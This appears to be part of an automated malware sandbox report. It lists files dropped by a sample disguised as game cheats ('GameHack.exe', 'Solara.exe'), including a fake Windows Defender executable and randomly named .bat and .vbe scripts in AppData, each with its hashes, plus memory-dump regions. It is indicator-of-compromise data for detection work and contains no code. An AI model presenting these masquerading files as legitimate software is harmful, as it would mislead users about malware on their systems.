C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
| MD5 | bc7804fca6dd09b4f16e86d80b8d28fa |
| SHA1 | a04800b90db1f435dd1ac723c054b14d6dd16c8a |
| SHA256 | 1628864ab0bafe8afea2ad70956b653550dab3db7c4cdf6f405e93a6c2441dce |
| SHA512 | 7534ac0a215f02af85bdf2b414e23face0570943f8820e7bfe97ea274ccd1a01618556e93b7465c2d9fbb0bcde5e97fab9e9b6bddd366554277ef308cde3a83c |
memory/2824-28-0x00000000728FE000-0x00000000728FF000-memory.dmp
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe
| MD5 | e8c32cc88db9fef57fd9e2bb6d20f70b |
| SHA1 | e732b91cd8ac16fa4ce8ad9e639bf21d69f6bb45 |
| SHA256 | f787ce198538b1c0b2bfce8ce5297e34152cf6deebe559df6887f65c72a081a4 |
| SHA512 | 077307d42438f2b72d62ce9e35c67c09e1375c2e203e6d6d455c6c8861c6442b3d82f1345b6c76940f5e8015fe93491158a59b102fabd139c742d75c2c42ba7a |
memory/2824-36-0x0000000000AA0000-0x0000000000D9E000-memory.dmp
memory/2824-45-0x00000000056B0000-0x00000000056BE000-memory.dmp
memory/336-46-0x0000000000400000-0x0000000000DF4000-memory.dmp
memory/2824-48-0x0000000005960000-0x00000000059BC000-memory.dmp
memory/2824-50-0x0000000006050000-0x00000000065F4000-memory.dmp
memory/2824-51-0x0000000005AA0000-0x0000000005B32000-memory.dmp
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe
| MD5 | d47062c8738a534fc931c0f341a61773 |
| SHA1 | c1175037a0e96363da56bc9d8abdb726cddc74fc |
| SHA256 | 484cc22b88e1eaae619f948e96812ebf70275f9e6408e2e3dbd8af827ac5199a |
| SHA512 | 9de6dcf7944ec9f2ff44c8fdbe562a6755c2af9800028b01fb0969921e6ef969c1ecc6e2ab129f191ac5feeaa9aa30cf436489dfee8e94433d6678a9942ffe39 |
memory/2824-53-0x0000000005F90000-0x0000000005FA2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe.config
| MD5 | a2b76cea3a59fa9af5ea21ff68139c98 |
| SHA1 | 35d76475e6a54c168f536e30206578babff58274 |
| SHA256 | f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839 |
| SHA512 | b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad |
memory/2168-69-0x00000000053D0000-0x00000000053E2000-memory.dmp
memory/2168-70-0x0000000005890000-0x00000000058DE000-memory.dmp
memory/2168-71-0x00000000061F0000-0x000000000628C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MpDefenderCoreProtion.exe.log
| MD5 | 663b8d5469caa4489d463aa9bc18124f |
| SHA1 | e57123a7d969115853ea631a3b33826335025d28 |
| SHA256 | 7b4fa505452f0b8ac74bb31f5a03b13342836318018fb18d224ae2ff11b1a7e8 |
| SHA512 | 45e373295125a629fcc0b19609608d969c9106514918bfac5d6b8e340e407434577b825741b8fa6a043c8f3f5c1a030ba8857da5f4e8ef15a551ce3c5fe03b55 |
memory/4504-76-0x00000000058D0000-0x00000000058E8000-memory.dmp
memory/4504-77-0x0000000005960000-0x0000000005970000-memory.dmp
memory/4504-78-0x0000000006590000-0x000000000659A000-memory.dmp
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat
| MD5 | fbef3b76368e503dca520965bb79565f |
| SHA1 | 9a1a27526b8b9bdaae81c5301cd23eb613ea62ba |
| SHA256 | bcb2af67a4ea1e6aa341cf3141941dbe7b17f1911e7f20aba46552571f99c9f3 |
| SHA512 | 2b99bc9a945b6d9a2c0d3206dce9221eb7f4a2040c5096909d60c3278254c52b39a28dd18dd4e005eff0ebd7e7cba6dd3a6a94ea8a7d7598da3001da174db3f5 |
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
| MD5 | 00c4245522082b7f87721f9a26e96ba4 |
| SHA1 | 993a8aa88436b6c62b74bb399c09b8d45d9fb85b |
| SHA256 | a728f531427d89c5b7691f989e886df57d46f90d934448e6dabf29d64d0662bf |
| SHA512 | fdd8d2444b28883face793f6ea77913c2096a425e6101202536ea001c3df5e76a60a01673ee7a52eae827a12299b2727002895395315db190ec82ae11a68559f |
memory/4312-83-0x0000000000CA0000-0x0000000000CA8000-memory.dmp
memory/4312-84-0x000000001B850000-0x000000001B954000-memory.dmp
memory/4312-86-0x0000000002D10000-0x0000000002D1E000-memory.dmp
memory/4312-88-0x0000000002D60000-0x0000000002D7C000-memory.dmp
memory/4312-89-0x000000001B7E0000-0x000000001B830000-memory.dmp
memory/4312-91-0x0000000002D80000-0x0000000002D98000-memory.dmp
memory/4312-93-0x0000000002D20000-0x0000000002D2E000-memory.dmp
memory/4312-95-0x0000000002D30000-0x0000000002D3C000-memory.dmp
memory/4312-97-0x0000000002D40000-0x0000000002D4E000-memory.dmp
memory/4312-99-0x0000000002DA0000-0x0000000002DAC000-memory.dmp
memory/4312-101-0x000000001B7D0000-0x000000001B7DC000-memory.dmp
memory/4312-103-0x000000001B830000-0x000000001B83E000-memory.dmp
memory/4312-105-0x000000001BA50000-0x000000001BA5C000-memory.dmp
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat
| MD5 | 2fa8decc3dafe6f196f6c28769192e7c |
| SHA1 | 69f4e0cf41b927634a38b77a8816ca58c0bfb2de |
| SHA256 | 7e40eb542d164397c0bf17a47c8f0db79e7028299e9f180d38505220fd2cfb30 |
| SHA512 | c9fb6c2ac2441ff14673ccaa3f1d5e703356c093353992d302d34df6c9e26a85aba6760c3b98f0cd0ada45183c55b2e5cabc09978ca084077dd71743ca9fdbc1 |
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
| MD5 | 52c95032ff8b8c3d4dfd98e51d8f6f58 |
| SHA1 | e841a32cb07adaad4db35b1f87b5df6e019eb9af |
| SHA256 | 39b35293e7efaa4cb94028e59872013bef4065788fef9fe3cd3206a8aee711e4 |
| SHA512 | a1177740ffbb476fb11f8112d98cabe3012ee3d54f2f848bb22ea99b53bd3526bf59065951fb6ef29f29408ab2fd90c942de65fe16d66a098abce8ba5d7d4e00 |
memory/2180-121-0x00000000003C0000-0x000000000051A000-memory.dmp
memory/2180-122-0x0000000002620000-0x000000000263C000-memory.dmp
memory/2180-123-0x0000000002640000-0x0000000002656000-memory.dmp
memory/2180-124-0x0000000002660000-0x0000000002670000-memory.dmp
memory/2180-126-0x0000000002680000-0x000000000268C000-memory.dmp
memory/2180-125-0x0000000002670000-0x000000000267E000-memory.dmp
memory/336-135-0x0000000000400000-0x0000000000DF4000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\igghsuce\igghsuce.cmdline
| MD5 | 1a2ee3a3487267d6810a536332371ddc |
| SHA1 | 0d07c211fa946644073202e25edf27cfe6607258 |
| SHA256 | 08798cfa1b05f38668bf19f39678f281c432590b1c5a614919905324899a2010 |
| SHA512 | 8d117a5936a3c9fcc128e94de0c4a1e5483f5a9b6436f818ff51c38f96db3e1f27a905322a0402087823413377561f7cbf25205c169699e303358bedffbd6036 |
\??\c:\Users\Admin\AppData\Local\Temp\igghsuce\igghsuce.0.cs
| MD5 | 42da9bd77f4212d41a0c0829aa24dbef |
| SHA1 | 2243674d35b802737c52ce7763fc0c3a993d08b1 |
| SHA256 | 6f59a64a07b34e6e41fb96093d59a2cb5fe768f292ae184fad01ee6b3f4535b1 |
| SHA512 | 234ef962a3a1f6c722631ac26119f890457cb809109ae8349217075eb23d3dcb71dd5670dae6fcdde5230a6343a30cdbbd811ad9ecf7747abf844d94040d5a72 |
\??\c:\Windows\System32\CSCD8D644E09FC241AA8996A8F16E59FB8.TMP
| MD5 | d544bac668d308d2aba58ded2c13d82d |
| SHA1 | e5dd50ef24d5c16629092f9290661a92387773b3 |
| SHA256 | 84b05d56c45fd0382410fcd59e16aeef467ed0a455595dda88386dd5c87d7a02 |
| SHA512 | 0826de2bc95d93dde2c540d2d768a0188481ee88f1da79f9c7d70d7ccd3c8715b8f1d62053f84d14f19e4d2b0a13e67084d970a158464e6223e340eb0733e1b0 |
C:\Users\Admin\AppData\Local\Temp\RESBA86.tmp
| MD5 | 0748262b111d6be414544e5921787b88 |
| SHA1 | 0375a8dc4a74f253ce1d33848e9fbccd82bf5cd7 |
| SHA256 | 2425b92cd8c236a407010ace4b8fe70385722bef76e2b52e3c378ea063dd7eab |
| SHA512 | 353795e45f1fad6df297a1f60540eccef1aa5bcbef8051a3da82834d4bb6d2664c567eff3cd8c026671f901521459dd8be7cc22366a67117f2479617e6421098 |
memory/988-183-0x000002E477BF0000-0x000002E477C12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mtwzinkm.ywp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\k0tbFJWvqp.bat
| MD5 | 872623011b29ff61b30e5774abfa7c3f |
| SHA1 | df0177c676805c85604948980043a312ad56c9d9 |
| SHA256 | 5b822cf6541581900e49449634e8b6dd615bbdd3603a111a97eb93638b3928a0 |
| SHA512 | b290a30926c2619fead5cb0b27c5141625da2482823e7a5a09d77704766e88285e0935a977a3b9acd21b388acccf34ce3695924af30ad1cd34138d8e530d9e13 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d42b6da621e8df5674e26b799c8e2aa |
| SHA1 | ab3ce1327ea1eeedb987ec823d5e0cb146bafa48 |
| SHA256 | 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c |
| SHA512 | 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2979eabc783eaca50de7be23dd4eafcf |
| SHA1 | d709ce5f3a06b7958a67e20870bfd95b83cad2ea |
| SHA256 | 006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903 |
| SHA512 | 92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 27f4165033acb4d91c709ff2f52c8564 |
| SHA1 | 0aaad2ad23295b51b306b5bd7533355f278d0850 |
| SHA256 | 3ad4137f5d9fa2369347f14acd4ba3736089440683edb0e72b7e5b1488f9ccee |
| SHA512 | 40324c119124f637d99cf9f4f0331c0e4c98597fefd1b0dd9db5416b177c72a7ab77a7d6655e5cca63151ac25b2f950a6cebf5e21736800c9726d672da0c7853 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\runtimesvc.exe.log
| MD5 | 23e95ec462ffa2c6ca8cab1cb8724ab1 |
| SHA1 | ee3f5e815831cf925c4f00195cc8f336b6112862 |
| SHA256 | c6ed38229b96cfb59e61de06854a1a99a9d6c3285a6b8511a7b60d64caa6979c |
| SHA512 | b92242ea8d3dbcd3de11725995c22f0a747b820cfff7cf44217589289621bdc2a25bb4db0e1f385bd6bc84c15d893fa5dad544e6bab89f072ccb822cd8bd08dd |